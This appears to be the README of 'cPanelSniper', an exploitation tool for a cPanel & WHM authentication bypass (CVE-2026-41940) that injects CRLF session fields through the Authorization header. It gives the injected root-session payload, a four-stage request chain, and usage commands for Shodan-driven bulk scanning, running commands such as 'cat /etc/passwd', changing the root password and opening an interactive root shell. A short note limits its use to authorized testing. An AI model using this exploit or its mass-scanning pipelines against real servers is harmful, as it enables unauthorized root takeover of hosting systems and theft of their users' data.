
CVE-2026-41940 β cPanel & WHM Authentication Bypass via Session-File CRLF Injection
CVE-2026-41940 β cPanel & WHM Authentication Bypass via Session-File CRLF Injection
4-stage exploit chain Β· Interactive WHM Shell Β· Bulk scanner Β· Pipeline ready Β· stdlib only
cPanelSniper is a focused exploitation framework for CVE-2026-41940, a critical authentication bypass vulnerability affecting cPanel & WHM. The vulnerability allows unauthenticated remote attackers to gain root-level WHM access by injecting CRLF sequences into the session file via the Authorization HTTP header β without any valid credentials.
For authorized penetration testing and bug bounty programs only.
The root cause lives in Session.pm: the saveSession() function calls filter_sessiondata() after writing the session file to disk. This means CRLF characters embedded in the Authorization: Basic header value are written verbatim into the session file, injecting attacker-controlled fields before sanitization occurs.
Normal flow:
POST /login/ β filter_sessiondata() β write session β auth check
Vulnerable flow:
POST /login/ β write session (CRLF payload injected) β filter_sessiondata() β auth check reads poisoned file
The Authorization: Basic value decodes to:
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
These fields are written directly into the session file on disk. When read back, cPanel treats the session as a fully authenticated root session.
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Stage 0 β Canonical Hostname Discovery β
β GET /openid_connect/cpanelid β 307 β real hostname β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Stage 1 β Mint Preauth Session β
β POST /login/?login_only=1 (wrong creds) β
β β 401 + whostmgrsession cookie β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Stage 2 β CRLF Injection β
β GET / + Cookie: session + Authorization: Basic <payload> β
β cpsrvd writes CRLF fields into session file β
β β 307 Location: /cpsessXXXXXXXXXX/... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Stage 3 β Propagate (do_token_denied gadget) β
β GET /scripts2/listaccts β
β Triggers rawβcache flush β injected fields become active β
β β 401 Token denied (expected) β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Stage 4 β Verify WHM Root Access β
β GET /cpsessXXXXXXXXXX/json-api/version β
β β 200 {"version":"11.x.x.x","result":1} = PWNED β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
| Branch | Vulnerable | Patched |
|---|---|---|
| 110.x | β€ 11.110.0.96 | 11.110.0.97 |
| 118.x | β€ 11.118.0.62 | 11.118.0.63 |
| 126.x | β€ 11.126.0.53 | 11.126.0.54 |
| 132.x | β€ 11.132.0.28 | 11.132.0.29 |
| 134.x | β€ 11.134.0.19 | 11.134.0.20 |
| 136.x | β€ 11.136.0.4 | 11.136.0.5 |
git clone https://github.com/ynsmroztas/cPanelSniper
cd cPanelSniper
python3 cPanelSniper.py --help
No pip install required. Pure Python 3.8+ stdlib only.
# Single target β scan only
python3 cPanelSniper.py -u https://target.com:2087
# Single target β interactive shell after bypass
python3 cPanelSniper.py -u https://target.com:2087 --action shell
# Bulk scan from file
python3 cPanelSniper.py -l targets.txt -t 20 -o results.json
# Force scan (skip cPanel detection)
python3 cPanelSniper.py -u https://target.com:2087 --force
# List all cPanel accounts on the server
python3 cPanelSniper.py -u https://target.com:2087 --action list
# Execute OS command
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "ls /home"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "cat /etc/passwd"
# Get server info (hostname, load, disk, MySQL host)
python3 cPanelSniper.py -u https://target.com:2087 --action info
# Get cPanel version
python3 cPanelSniper.py -u https://target.com:2087 --action version
# Change root password
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd 'NewPass@2026!'
# Interactive WHM shell
python3 cPanelSniper.py -u https://target.com:2087 --action shell
# subfinder β httpx β cPanelSniper
subfinder -d target.com -silent | \
httpx -silent -ports 2087,2086 -threads 50 | \
python3 cPanelSniper.py -t 30 -o results.json
# From scope list
cat scope.txt | \
httpx -silent -ports 2087,2086 -threads 100 | \
python3 cPanelSniper.py -t 30 -o results.json
# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | \
python3 cPanelSniper.py -t 30 -o shodan_results.json
# stdin pipe
echo "https://target.com:2087" | python3 cPanelSniper.py
# Multiple sources combined
{ subfinder -d target.com -silent; cat extra.txt; } | \
httpx -silent -ports 2087 | \
python3 cPanelSniper.py -t 20 --action list
After a successful bypass, the --action shell flag drops into an interactive prompt:
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
WHM Shell β target.com
Version: CVE-2026-41940 | Auth: CRLF bypass
Type 'help' for commands, 'exit' to quit
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
[email protected] βΆ id
uid=0(root) gid=0(root) groups=0(root)
[email protected] βΆ accounts
[cPanel Accounts] target.com:2087 (47 users)
user01 domain: example.com email: [email protected]
user02 domain: shop.com email: [email protected]
...
[email protected] βΆ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
[email protected] βΆ info
[Server Info] https://target.com:2087
hostname: srv01.target.com
load: 0.72 / 0.66 / 0.69
version: 11.130.0.6